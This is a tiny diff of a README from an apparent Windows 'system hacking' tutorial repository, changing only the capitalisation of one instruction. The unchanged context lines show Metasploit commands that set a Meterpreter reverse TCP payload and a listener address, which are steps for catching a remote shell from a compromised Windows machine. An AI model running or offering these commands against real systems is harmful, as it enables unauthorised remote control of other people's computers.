yashwankhede/system_hacking-windows-XP-7-10-/README.md

 `msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp`

-*select the same payload of which we have created the exploit*
+*Select the same payload of which we have created the exploit*

 `msf6 exploit(multi/handler) > set LHOST 192.168.1.12`